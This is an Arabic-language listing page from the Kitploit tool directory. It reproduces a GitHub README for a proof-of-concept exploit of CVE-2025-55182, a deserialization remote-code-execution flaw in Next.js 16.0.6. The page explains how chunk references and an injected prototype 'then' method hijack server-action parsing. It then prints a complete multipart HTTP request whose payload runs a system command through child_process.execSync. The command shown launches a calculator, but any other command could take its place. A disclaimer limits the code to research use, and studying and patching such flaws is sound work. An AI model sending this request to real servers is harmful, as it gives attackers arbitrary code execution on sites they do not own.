Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-55182-RCE-Exploit — أكثر تركيزًا على الاستغلال؛ رائع لمستودعات أبحاث الأمان. | Kitploit
أدوات/GitHubGitHub/orgito1015/cve-2025-55182-rce-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالأوراق والأبحاثالتعلم والتعليمتطوير الحمولات
GitHuborgito1015/cve-2025-55182-rce-exploit

CVE-2025-55182-RCE-Exploit

أكثر تركيزًا على الاستغلال؛ رائع لمستودعات أبحاث الأمان.

عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لـ CVE-2025-55182 – تنفيذ التعليمات البرمجية عن بُعد في Next.js 16.0.6

يحتوي هذا المستودع على إثبات مفهوم (POC) عامل لـ CVE-2025-55182، وهي ثغرة أمنية حرجة لإلغاء التسلسل تؤثر على Next.js 16.0.6. يستغل الاستغلال إلغاء تسلسل الكتلة $@ و Chunk.prototype.then للحصول على سيطرة كاملة على عملية حل الكتلة وتحقيق تنفيذ تعليمات برمجية عشوائي (RCE) على الخادم.

ملخص الثغرة الأمنية

يستخدم Next.js كائنات Chunk داخلية وآلية تدفق/إلغاء تسلسل لإجراءات الخادم. من خلال إساءة استخدام $@ لإلغاء تسلسل مرجع Chunk وحقن Chunk.prototype.then في الكائن الجذري، يمكن للمهاجم:

  • إجبار Next.js على استدعاء then(...) مع يتحكم به المهاجم
this
  • تعيين status للكتلة إلى resolved_model
  • تشغيل initializeModelChunk بكتلة مزيفة يتحكم بها المهاجم بالكامل
  • إساءة استخدام طرق chunk._response للوصول إلى سلوك داخلي خطير
  • الهدف النهائي هو تشغيل إلغاء تسلسل Blob، الذي ينفذ استدعاءً مثل:

    root@kitploit:~
    response._formData.get(response._prefix)
    

    من خلال تعيين response._formData.get = Function ووضع تعليمات برمجية عشوائية في response._prefix، يمكن للمهاجم تنفيذ أوامر نظام عشوائية.

    إثبات المفهوم للاستغلال

    يُظهر طلب HTTP في poc/CVE-2025-55182.http الاستغلال ضد Next.js 16.0.6 الذي يعمل محليًا، مما يؤدي إلى تشغيل xcalc عبر child_process.execSync:

    root@kitploit:~
    POST / HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Next-Action: x
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Length: 459
    
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="0"
    
    {"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad
    Content-Disposition: form-data; name="1"
    
    "$@0"
    ------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
    

    هيكل المستودع

    root@kitploit:~
    /
    ├── README.md
    ├── DISCLAIMER.md
    ├── poc/
    │   └── CVE-2025-55182.http
    └── analysis/
        └── exploitation-notes.md
    

    إخلاء مسؤولية

    يتم توفير هذا المشروع لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الاستغلال على أي نظام لا تملكه أو ليس لديك إذن كتابي صريح لاختباره.

    المؤلف لا يتحمل أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج.

    تنزيل الأداة